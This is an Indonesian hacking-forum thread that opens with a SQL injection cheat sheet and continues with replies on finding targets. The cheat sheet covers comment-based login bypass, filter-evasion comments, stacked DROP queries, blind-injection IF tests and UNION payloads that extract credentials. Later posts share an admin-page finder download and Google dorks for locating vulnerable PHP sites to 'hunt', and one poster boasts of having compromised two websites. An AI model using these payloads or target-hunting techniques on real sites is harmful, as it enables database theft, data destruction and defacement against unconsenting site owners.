next »

[Esca]

Simple SQL Injection Tutorial

This information is for educational purpose only.
Please use this information wisely.

Udah pada tau kan soal SQL injection?

Disini ga akan dibahas gimana cara inject nya tapi berbagai syntax yang bisa kita gunakan
untuk menginject suatu website (jika emang bisa diinject).

Oke, lets’ begin

Syntax SQL Injection
1. Commenting out.
Gunanya untuk mengakhiri suatu query, bypass query.
+ SQL Server
Syntax: –
Penggunaan: DROP namatabel;–
+ MySQL
Syntax: #
Penggunaan: DROP namatabel;#

Contoh penggunaan in real life:
* Username: admin’–
* Proses query yang terjadi di server:
SELECT * FROM userlist WHERE username=’admin’–’ AND password=’password’;
Query ini akan memberikan km akses sebagai admin karena query selanjutnya setelah — akan diabaikan

2. Inline comment
Gunanya untuk mengetahui versi SQL server yang digunakan atau untuk bypass script proteksi
+ SQL Server (MySQL juga bisa)
Syntax: /*Comment*/
Penggunaan: DROP/*comment*/namatabel
atau: DR/**/OP/*bypass proteksi*/namatabel
atau: SELECT/*menghindari-spasi*/password/**/FROM/**/userlist

+ MySQL (mendeteksi versi)
Syntax: /*!MYSQL Special SQL*/
Penggunaan: SELECT /*!32302 1/0,*/1 FROM namatabel
Note: Syntax juga bisa digunakan jika versi MySQL lebih tinggi dari 3.23.02 (sesuai query), tidak berfungsi untuk versi dibawahnya

3. Staking queries
Gunanya untuk menyambung 2 buah query dalam 1 transaksi.
+ SQL Server
Syntax: ;
Penggunaan: SELECT * FROM namatabel; DROP namatabel–

4. Pernyataan IF
Ini kunci jika melakukan Blind SQL Injection, juga berguna untuk testing sesuatu yang ga jelas secara akurat
+ SQL Server
Syntax: IF kondisi bagian-true ELSE bagian-false
Penggunaan: IF (1=1) SELECT ‘true’ ELSE SELECT ‘false’

+ MySQL
Syntax: IF(kondisi,bagian-true,bagian-false)
Penggunaan: SELECT IF(1=1,’true’,’false’)

5. Operasi String
Gunanya untuk bypass proteksi
+ SQL Server
Syntax: +
Penggunaan: SELECT login + ‘-’ + password FROM userlist
+ MySQL Server
Syntax: ||
Penggunaan: SELECT login || ‘-’ || password FROM userlist

Note: Jika MySQL server dalam mode ANSI syntax berfunsi. Cara lain adalah dengan menggunakan fungsi CONCAT() dalam MySQL.
Syntax: CONCAT(str1,str2,str3,…)
Penggunaan: SELECT CONCAT(login,password) FROM userlist

6. Union Injection
Gunanya menggabungkan 2 tabel yang berbeda dengan syarat tabel itu harus sama jumlah kolomnya.

Syntax: UNION
Penggunaan: ‘ UNION SELECT * FROM namatabel
atau: ‘ UNION ALL SELECT * FROM namatabel
atau: ‘ UNION SELECT kolom1,kolom2 FROM namatabel
Proses yang terjadi dalam query:
SELECT * FROM user WHERE id=’1′ UNION SELECT kolom1,kolom2 FROM namatabel

Jika tabel tersebut mempunyai kolom yang berbeda, maka dapat ditambahkan null atau 1
Penggunaan: ‘ UNION SELECT 1,kolom1,kolom2 FROM namatabel

- Enjoy -

Source :
Web tetangga

[crepes]

pencegahannya gmana ya bung esca ??
ntar g coba2 ah sql injection nya ^^

[Djfunky]

gw ada video tutorial sql injection,dan sukses dari ikutin video itu,

gw da makan 2 korban website dari itu video..

mau bung crepes?

[MataHati]

Untuk mencari admin page bisa pake
admin page finder.

Download here
http://file.indoimage.com/download.php?file=152870

Bisa juga scan pake intellitamper.
Link download cari di google aja.

Ada di laptop, cm installernya udah ilang wkwk..


sekedar tambahan,
buat nyari web yang lebih spesifik bisa gunakan dork yang bertebaran di google.

Ex :

gw mau nyari web malaysia dengan web berbasis .php

inurl:".com.my" & inurl:".php?id="

Dork juga bertebaran di google.
 

Selamat hunting 

[Djfunky]

Untuk mencari admin page bisa pake
admin page finder.

Download here
http://file.indoimage.com/download.php?file=152870

Bisa juga scan pake intellitamper.
Link download cari di google aja.

Ada di laptop, cm installernya udah ilang wkwk..


sekedar tambahan,
buat nyari web yang lebih spesifik bisa gunakan dork yang bertebaran di google.

Ex :

gw mau nyari web malaysia dengan web berbasis .php

inurl:".com.my" & inurl:".php?id="

Dork juga bertebaran di google.
 

Selamat hunting 

tolong jelasin dunk,dork itu apaan,gw dari dulu cari tau dork itu apaan tp ga dapet2 maksud nya apaan

orang2 di forum hacker sering bilang "pake DOrk aja",pas gw googling,banyak dork macem2 ga ngerti gw,,

[MataHati]

whahawhawhawh..

ga ada penjelasan yah..
ini pengertian menurut gw yahh..

dork itu buat pem-spesifikasian untuk pencarian google.

dork yang gw tau

inurl
allinurl
intittle
intext
site
filetype

Contoh :
inurl:"himsisfo"
Maka google akan mencari link yang berkaitan dengan kata himsisfo

allinurl:"binus"
Maka google akan mencari semua link yang berkaitan dengan kata binus

intittle:"wikipedia"
Maka google akan mencari semua halaman web yang mempunyai tittle dengan kata wikipedia

intext:"indonesia"
Maka google akan mencari semua halaman web yang memiliki kata-kata "indonesia" di dalamnya.

site:id
Maka google akan mencari semua site yang memiliki url dengan kata id

filetype:.doc
Maka google akan mencari semua halaman web berekstensi .doc
Biasanya file tipe ini digunakan untuk mencari file tertentu
Example : http://binus.ac.id/mahasiswa/listpembayaran.doc

Maka jika dibuka bakal langsung kedownload

Nah kalo pdf ya kbuka dengan adobe reader (rata", tergantung settingan)

____________________________________________________________________________________________


Nah dengan adanya dork ini,
Attacker bakal berusaha buat mencari website yang ingin dia kerjain atau bisa juga mencari website yang vuln.

Contoh :
Misalkan attacker mau kerjain sitenya orang inggris.
Nah dia bisa nulis dengan kata

inurl:".co.uk"

Maka google akan mencari semua halaman website yang ber-link dengan kata .co.uk

Misalkan dikombinasikan dengan intext, maka contohnya seperti ini :

inurl:".co.uk" & intext:"maybe"

Maka google akan menampilkan semua website yang ber-link .co.uk dan mempunyai text "maybe" di dalam websitenya.


Google bagaikan pedang bermata 2.
Kalo digunakan dengan bijak, maka akan sangat membantu
Tak terkecuali buat defacer/cracker/carder dll, akan sangat membantu dalam aksinya.

Sekian.

[wilson_1002003]

keren!! 

[asu 619]

mantap kk